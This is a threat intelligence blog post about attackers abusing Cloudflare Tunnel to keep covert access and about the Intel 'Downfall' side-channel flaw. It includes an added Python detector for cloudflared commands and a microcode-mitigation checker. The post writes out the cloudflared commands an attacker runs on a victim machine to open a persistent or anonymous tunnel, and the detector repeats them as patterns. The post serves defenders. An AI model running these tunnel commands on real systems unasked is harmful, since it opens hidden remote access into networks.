The PacketWatch Intelligence Team, Aug 14, 2023 3:29:14 PM
Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights how threat actors are abusing the legitimate Cloudflare service ‘Cloudflare Tunnel’ to establish persistence and obfuscate activity and a new side-channel attack ‘Downfall’ disclosed for Intel processors.
New research from Guidepoint Security highlights a new technique that abuses Cloudflare Tunnel (a.k.a. Cloudflared), which threat actors are leveraging for stealth and maintaining persistent access within a target network.
Per Cloudflare's documentation, Cloudflare Tunnel provides a secure way to connect resources to Cloudflare without a publicly routable IP address. No traffic is sent to an inbound external IP; instead, the 'cloudflared' daemon creates outbound-only connections to the Cloudflare global network. The Tunnel supports connections to HTTP servers, SSH servers, remote desktops, and other protocols.
1. The threat actor configures the Tunnel environment on their own Cloudflare account.
2. The threat actor gains access to the victim's machine via traditional methods (e.g. phishing, social engineering, remote exploit).
3. The threat actor issues a single command on the victim machine, establishing a persistent tunnel back to the attacker-controlled Cloudflare environment.
The only parameter that needs to be passed on the command line is the token associated with the tunnel the threat actor created:
cloudflared tunnel run --token <token from Cloudflare>
The 'private network' configuration lives on the attacker's Cloudflare account and is not reflected in the configuration output shown on the victim's command line, effectively hiding it from defenders.
This allows the threat actor to interact with any device on the 'private network'.
Cloudflare Tunnel also allows entire CIDR ranges to be exposed through the tunnel.
It should also be noted that Cloudflare offers a TryCloudflare feature, which allows users to create a single-use cloudflared tunnel. This setup process would allow a threat actor to create a tunnel without providing identifying information to Cloudflare for attribution:
cloudflared tunnel --url http://localhost:<port>
While the tunnel itself provides a great layer of obfuscation for the threat actor, several indicators can be monitored for this type of activity:
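As an added example (not part of the original briefing), a small detector that scans process-creation events for the two cloudflared invocations described above, the token-based persistent tunnel and the TryCloudflare --url quick tunnel. The log format and the sample events are constructed for this example; any token value is masked before it lands in an alert.

```python
import os
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (not real telemetry). Assumed format:
# "<timestamp> host=<host> user=<user> cmd=<full command line>"
SAMPLE_EVENTS = """\
2023-08-10T12:00:01Z host=ws01 user=alice cmd=C:\\Users\\alice\\AppData\\Local\\Temp\\cloudflared.exe tunnel run --token eyJhIjoiY29uc3RydWN0ZWQifQ
2023-08-10T12:00:05Z host=ws02 user=bob cmd=cloudflared tunnel --url http://localhost:3389
2023-08-10T12:00:09Z host=ws03 user=carol cmd=notepad.exe report.txt
2023-08-10T12:00:12Z host=srv01 user=svc cmd=/usr/local/bin/cloudflared tunnel run --token REDACTED-FOR-EXAMPLE
2023-08-10T12:00:15Z host=ws04 user=dave cmd=cloudflared --version
"""

EVENT_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.+)$")


def classify_cloudflared(cmd: str) -> Optional[str]:
    """Return a finding label for a cloudflared tunnel invocation, or None if not one."""
    argv = cmd.split()
    if not argv:
        return None
    exe = os.path.basename(argv[0].replace("\\", "/")).lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    if exe != "cloudflared":
        return None
    args = argv[1:]
    if "tunnel" not in args:
        return None  # cloudflared binary present, but not starting a tunnel (e.g. --version)
    if "run" in args and "--token" in args:
        return "token_tunnel"  # persistent tunnel tied to an attacker-controlled account
    if "--url" in args:
        return "trycloudflare_quick_tunnel"  # single-use TryCloudflare tunnel, no account needed
    return "tunnel_other"


def scan_events(text: str) -> List[Dict[str, str]]:
    """Parse constructed events and return one finding per cloudflared tunnel command."""
    findings = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        label = classify_cloudflared(m["cmd"])
        if label:
            # Mask the token so the alert itself does not leak the tunnel credential
            safe_cmd = re.sub(r"(--token)\s+\S+", r"\1 <masked>", m["cmd"])
            findings.append({"ts": m["ts"], "host": m["host"], "user": m["user"],
                             "finding": label, "cmd": safe_cmd})
    return findings
```

Running scan_events(SAMPLE_EVENTS) flags ws01 and srv01 for token-based tunnels and ws02 for a quick tunnel; the notepad and --version events produce nothing.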
Last week, security researchers at Google published research on a new side-channel attack against certain Intel CPU architectures. The vulnerability is tracked as CVE-2022-40982 and is nicknamed 'Downfall'. If exploited under the correct conditions, the vulnerability can lead to disclosure of passwords, cryptographic keys, and other sensitive information.
This vulnerability affects Intel Server CPUs, from the 6th (Skylake) generation to 11th (Tiger Lake) generation processors. A full list of vulnerable CPU models can be found on Intel's site here.
For this vulnerability to be successfully exploited, the threat actor's code needs to be running on the same physical processor core as the victim. This scenario is most common in cloud computing. The threat actor would need to deliver a malicious payload and execute it on the same physical processor as the victim. Given the specific conditions that need to be met to carry out the attack, the overall risk is considered to be low. However, proof-of-concept code has been published to GitHub, along with detailed research and documentation of the vulnerability, making public exploitation a possibility.
Intel has a microcode update that can mitigate the vulnerability, which can be found here. Additional information from Intel regarding the vulnerability can be found here.
It should be noted that applying this update can result in up to 50% performance degradation. Organizations must decide if negating the risk of exploitation is worth the performance penalty of the CPU.
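As an added example (not from the original briefing), a helper that reports whether a Linux host has the Downfall microcode mitigation in place. It assumes the sysfs entry that Linux kernels carrying the Gather Data Sampling mitigation expose, /sys/devices/system/cpu/vulnerabilities/gather_data_sampling, and maps the kernel's status string to an action; the status strings used in the test are constructed from the values that file reports.

```python
import os
from typing import Tuple

# Assumed path: kernels with the GDS mitigation expose the status here (a kernel fact, not
# something the briefing states). Older kernels simply do not have the file.
GDS_SYSFS = "/sys/devices/system/cpu/vulnerabilities/gather_data_sampling"


def classify_gds(status: str) -> Tuple[str, str]:
    """Map the kernel's gather_data_sampling string to (state, recommended action)."""
    s = status.strip()
    if s == "Not affected":
        return ("not_affected", "no action required")
    if s.startswith("Mitigation: Microcode"):
        return ("mitigated", "microcode mitigation active; weigh the performance impact noted above")
    if s.startswith("Mitigation: AVX disabled"):
        return ("mitigated_no_microcode", "kernel fallback (AVX disabled); install the Intel microcode update")
    if s.startswith("Unknown"):
        return ("unknown", "virtual machine: confirm the mitigation with the hypervisor operator")
    if s.startswith("Vulnerable"):
        return ("vulnerable", "install the Intel microcode update")
    return ("unrecognized", "inspect the raw status string: " + s)


def check_host(path: str = GDS_SYSFS) -> Tuple[str, str]:
    """Read the sysfs entry on this host; report when the kernel cannot tell us."""
    if not os.path.exists(path):
        return ("no_sysfs_entry", "kernel does not report GDS status; verify microcode level another way")
    with open(path, encoding="ascii") as fh:
        return classify_gds(fh.read())


if __name__ == "__main__":
    state, action = check_host()
    print(f"{state}: {action}")
```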
PacketWatch publishes this report and other cybersecurity threat intel to the security community for free via our blog. If you are interested in personalized threat intel, contact us today to learn about our enterprise threat intelligence services.
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.